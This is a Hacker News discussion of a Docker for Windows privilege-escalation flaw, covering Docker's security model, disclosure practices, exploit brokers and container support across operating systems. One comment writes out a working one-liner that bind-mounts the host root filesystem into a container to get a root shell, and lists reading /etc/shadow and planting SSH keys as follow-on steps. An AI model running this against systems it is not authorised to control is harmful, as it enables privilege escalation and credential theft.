You can't contain me: elevation-of-privilege vulnerability in Docker for Windows (srcincite.io)
144 points by ingve on Sept 6, 2018 | 46 comments



On Linux, at least, being able to access the docker daemon (i.e. being in the docker group) is essentially equivalent to being root, in that there are trivial ways to become root if you can start an arbitrary container (e.g. bind-mounting / into a container).
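For the curious, a minimal sketch of that trick (assuming your user is in the docker group and the alpine image is pullable):

    # Bind-mount the host's root filesystem and chroot into it;
    # the container's default user is root, so the resulting shell
    # is root over the host's entire filesystem.
    docker run --rm -it -v /:/host alpine chroot /host /bin/sh

From there you can read /etc/shadow, drop a setuid binary, add an SSH key, and so on.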

So, it’s perhaps unclear how this exploit is significantly worse. Yes, you get access to SYSTEM, but Docker’s permission model appears to be predominantly “if you can control Docker then you own the machine”. Is this not the case on Windows?


The difference as I understand it is documentation. For Linux, the Docker docs make it abundantly clear what the security model is - don’t give access to the daemon socket to anyone you don’t trust to be root.

For Windows, on the other hand, there seems to be no official documentation on the topic. Instead, some “unofficial” documentation has popped up to fill the void, making insecure recommendations in the process. This then becomes Docker’s problem.

I think it’s a good general lesson for documenting a platform: in the end you are responsible not only for what you explain to your users, but also for what they explain to each other. This can be frustrating because it makes you responsible for something you cannot control, as Docker couldn’t control the recommendations in that GitHub thread. But you are still on the hook for addressing it, in this case probably by filling the gap in official documentation.


> This can be frustrating because it makes you responsible for something you cannot control

If bad recommendations are a product of bad or non-existent documentation, then that very much is something you can control; they are a direct consequence of that neglect.

If Docker couldn't be bothered, the blame should not fall on the bad recommendations.


If you can control Docker, you can do what Docker does. But Docker doesn’t need to be able to do everything (as long as you’re sure that you’ll never need to run a container that needs to do those things.) Specifically, you can run the Docker daemon itself under any combination of cgroup+namespace restrictions (i.e. “in a container”, though not usually in the sense of running Docker in Docker.)


> you can run the Docker daemon itself under any combination of cgroup+namespace restrictions

Not really though. The docker daemon needs access to the mount call, so it either must be root or root within its namespace.

It's incredibly difficult to remove any meaningful permissions from the docker daemon.

This is true for running any container, not just one with bind mounts.

The docker daemon was not built to be anything but root, and running it as "docker in docker" only works with "--privileged", which is to say, with no security restrictions.
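For illustration, the usual docker-in-docker setup (using the official docker:dind image; the container name here is just an example) looks something like:

    # --privileged grants all capabilities and device access and disables
    # the default seccomp/AppArmor profiles; the inner daemon needs that
    # much in order to mount filesystems and create namespaces.
    docker run --privileged --name some-dind -d docker:dind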


Sadly, many docker images you might want to try fail when run under Docker running in an unprivileged container.


> Docker at first denied a vulnerability existed at all, but later patched it on July 19th. After further discussions, they assigned CVE-2018-15514 on the 18th August.

It’s frustrating that this is the default reaction. I know why it occurs, at least from a human psychological standpoint, but it’s still frustrating. I’ve reported vulnerabilities and received no reply, only to find them thanklessly fixed later. And most of the time, my notifications are ignored entirely. It becomes depressing very quickly.


Something similar happened to me with Amazon a while back. I found some vulns, and they fixed them but never publicly acknowledged them, because they said "the cloud is always patched" so there was no need to tell anyone, which I thought was an odd response.


Same for the RocketChat developers: https://github.com/RocketChat/Rocket.Chat/pull/10793

"We do not disclose security fixes as soon we have them fixed to prevent bad guys to exploit them."

"as soon we have" means never.

They apparently believe bad guys don't monitor the commits of the products they target.


Not disclosing fixes in release changelogs potentially increases the chance of people being affected.

If I see a changelog with an XSS fix I will update the product straight away; if I don't, I might leave it a week or two until I have time.


I had a similar experience a few years back with Google (specifically the Android security team). They were eager to get the issue fixed, but not interested in public disclosure or acknowledgement.


Are there possible legal consequences to acknowledging such a report, though? Maybe it's not just psychological, but a CYA move.


Generally no, there is minimal liability attached to acknowledging a report. There may be internal political issues and definitely external media ones, though.

Nobody wants to be the person who says "We're vulnerable, but I don't care enough to fix it". That's how you get internal political battles. Denial solves that problem.

When dealing with external reports, it means ammunition for dealing with third parties. "We are not aware of any such vulnerabilities" becomes a defensible position, as does telling reporters that you dispute the claims of vulnerability. Those buy time to maybe fix something.

And, well, there's the CYA psychology too. Nobody wants to confront the idea that they, or their smart and hard-working coworkers, screwed up to the point of creating a significant vulnerability.


It's unlikely. Many companies handle this sort of thing every day and don't deny the issue, just delay confirmation. It's more likely that someone within Docker decided that they didn't believe the report, but didn't bother to investigate properly before responding.


Personally I've been turned off by Docker the company on numerous occasions. (Still love docker the project)

Are there any inroads to a truly open source implementation of Docker for Mac and Windows? (Though I assume running a Linux VM would suffice?) It seems unfortunate that the default is running a non-open binary.


What is that about?

    - 2018-04-03 - Verified existing and sent to iDefense’s VCP
    - 2018-04-04 - Validated and acquired by iDefense
Is there a company that buys information about bugs ahead of time so they can protect their clients?

(a cursory Internet search didn't answer my question)


> Is there a company that buys information about bugs ahead of time so they can protect their clients?

Companies like Zerodium act as brokers for 0-day exploits, but they tend to sell only to government agencies and the like.

https://zerodium.com/about.html


Gee. Is that really ethical?

Presumably their customers don't intend to patch the bugs without help from the vendor. They likely intend to exploit the bugs (in the name of state surveillance). Many/most global governments (all?) aren't trustworthy in this regard. If you disclose a bug to Zerodium, can you trust them not to have "bad" governments as customers? Also, consider a Sybil attack: Zerodium is an untrustworthy government front.

> ZERODIUM customers are mainly government organizations in need of specific and tailored cybersecurity capabilities, as well as major corporations from defense, technology, and financial sectors, in need of protective solutions to defend against zero-day attacks.

shrug, okay, I hope that's the case.


And iDefense is doing something similar?


They are more "security alerts as a service":

https://searchsecurity.techtarget.com/feature/VeriSign-iDefe...


[flagged]


Linux I could understand, but not MacOS. Of the three major desktop platforms, it's the only one without native containerization support...


I think this is because Apple has no ambitions to make MacOS a dominant server operating system for internet-based services.

In fact, I am not fond of the rather popular trend of brewing ported versions of Linux tools onto MacOS to develop applications that will actually be deployed on Linux, so I am glad containerisation mitigates some of this problem and that MacOS makes you do it in a VM running Linux. Linux, being a Unix-like operating system, is an internet server operating system first (the most dominant one, too) and a desktop operating system second. However, Linux distributions for servers and desktops are designed and managed very differently, which is why things like Docker were invented to reduce the issues caused by those differences.

Windows, on the other hand, is a desktop operating system first and an office productivity server second, but Microsoft has also attempted to make its operating system dominant for all other servers and devices, to the exclusion of everything else. They have not really succeeded at this, and containerisation and the cloud have made it even harder, which is why they have to wedge Docker into Windows as a tick-box exercise while also trying to make it appear to work natively.


I'm not sure I'd agree with the characterization that Windows container support is a "tick box" exercise. I've followed the efforts of the team working on it, and it seems to me like they've put in a lot of work over a number of years to make this work in a Windows environment.



Not really missing anything; it's just that on macOS you actually need a VM to run Docker. Docker for Mac uses a HyperKit VM and starts Docker containers inside it.

It's mostly the same on Windows (you need Hyper-V or VirtualBox to run Docker), but they are making efforts to run containers natively. Not sure how far they've got with that.

In the end, if you want the best performance with minimum resource usage, you need a Linux OS.
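One quick way to see the hidden VM for yourself (assuming Docker for Mac is installed and running):

    # The reported kernel is the LinuxKit kernel of the HyperKit VM,
    # not Darwin, even though you ran the command on a Mac.
    docker run --rm alpine uname -a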


There's support for Windows containers in Docker, but it's probably not useful for the majority of users, because most Docker images are based on Linux, so you'll need to run a Linux VM for practical usage. I think WSL might make it possible to run Linux-based images natively, but I haven't heard of that yet.


Linux containers on Windows via WSL, I've heard, work in the latest Insider builds to at least some degree, but I haven't tried it to confirm.

There are a reasonable number of Windows container images on Docker Hub, although nothing like the volume of Linux ones.


Windows native containers are running on top of Hyper-V.


Windows Server containers are not necessarily run inside Hyper-V: https://docs.microsoft.com/en-us/virtualization/windowsconta...


My bad. Looks like they've implemented their own equivalent of Linux namespaces from scratch (described nicely here [0]).

[0] http://www.solidalm.com/2017/03/06/deep-dive-into-windows-se...


To clarify, my understanding is that on Windows you will always need a VM to run Linux containers, but there will be (are?) native Windows containers.

The dream is that maybe one day WSL will fully support Linux containers without a vm, but I will be amazed if they can pull that off.


Well, if you think about it, they already have containers on Windows - the WSL is effectively a container for each distro install.

Emulating Linux-level container APIs is also possible in principle.


It isn't really containerized, the same way Wine on Linux isn't. There is no isolation.


I have yet to bother with WSL as I am perfectly fine with Windows standard tooling, but it is built on top of Drawbridge, so it certainly has isolation in place.


Yep, there is experimental support for native Windows containers. (Not sure if it's still experimental, as things move really fast in this space.)

As I remember, you couldn't have Windows and Linux containers running at the same time, so you needed to flip a switch in the Docker config to choose one; see the sketch below.

In general I'm a Linux guy, but it would be really cool if they can get to a point at which you can run both Windows and Linux containers at the same time.
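If I remember right, that switch is exposed both in the whale tray menu and through the bundled CLI; the path below is the default install location and may vary:

    # PowerShell: flip the Docker for Windows daemon between Linux and
    # Windows container modes. Only one mode is active at a time.
    & "C:\Program Files\Docker\Docker\DockerCli.exe" -SwitchDaemon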


You can get Windows containers without VMs on Windows Server 2016.

The WSL with Linux containers apparently does work with the latest Insider builds...


Windows containers work on Windows Server 2016 with Job-object-based isolation (no VM needed). They also support Windows and Linux containers (via LCoW) using Hyper-V VMs.
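As a sketch, the mode is chosen per container with the --isolation flag (the image name below is illustrative; process isolation also requires the container's base image to match the host build):

    # Process isolation: shares the host kernel, Job-object based.
    docker run --isolation=process microsoft/nanoserver cmd
    # Hyper-V isolation: the container gets its own lightweight utility VM.
    docker run --isolation=hyperv microsoft/nanoserver cmd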


That's a bit surprising considering how many web developers use OS X & Docker.


It has nothing to do with popularity; a Linux container needs a Linux kernel. (Similarly, if you want to run Windows containers on Linux, you'll need a VM. And if there were ever a case for MacOS containers, they'd probably be native.)


Please don't start flamewars.


Video games. You forgot video games.


>Windows is for Office tools and watching movies.

And how do you suggest I run Visual Studio and WPF applications on Mac or Linux?


I guess in that case you're not using Docker.


I think chrisper was pointing out the snideness of the idea that Windows can't be used for development.


Windows VM


But then I am developing in Windows again anyways.



